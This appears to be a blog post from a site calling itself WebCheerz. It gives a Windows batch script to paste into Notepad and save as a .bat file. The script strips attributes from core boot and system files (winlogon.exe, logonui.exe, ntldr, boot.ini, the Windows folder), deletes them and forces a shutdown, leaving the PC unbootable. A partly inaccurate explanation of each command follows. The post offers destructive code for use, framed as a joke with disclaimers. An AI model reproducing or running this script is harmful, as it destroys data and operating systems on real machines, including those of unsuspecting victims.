Quick Read: This Code will Corrupt your windows PC files with in few minutes. WebCheerz team is not responsible for the nuclear war happens on your PC. Try at your own risk.
Now a days destroying their own PC is fun. 😛 Just joking. You should also learn How to destroy. It’ll help you in the right moment. This Command will delete all the files which helps to boot Windows OS. Then OS will automatically get corrupted. You can also add other partitions by following the same code.
Click Here to Join our Telegram Channel to get Instant updates
Notice : This will Delete all the files of partitions which is mentioned in the code.
Open your Notepad and paste the following code
@echo off del C:\WINDOWS\system32\winlogon.exe del C:\WINDOWS\system32\logonui.exe del C:\WINDOWS\ attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini @echo off msg *message here shutdown -s -t 8 -c "message here"
Now Save this as “Example.bat” (without quotes) when you Double click it. BOOM !! After restart you’ll see a Blue Screen of Death. Do this at your own risk. WebCheerz Team is not responsible for any damage caused by you.
Here’s how the code works :
@echo off - This command will terminate your current prompt del - This command will delete the specified file attrib -r - This will make read only file rewritable attrib -s - This will make system film user defined attrib -h - This will unhide hidden files shutdown -s - This will shutdown the computer shutdown -t - Allows you to set time duration for shutting down shutdown -c - Allows you to add your own comment (ex: Good Bye)
Notice : Do at your own risk. WebCheerz Team is not responsible for any damage caused by you.
[wpdevart_like_box profile_id=”1552756811681602″ connections=”show” width=”800″ height=”170″ header=”small” cover_photo=”show” locale=”en_US”]
Thanks
Thanks for your Feeback. It will helps us to improve our Article quality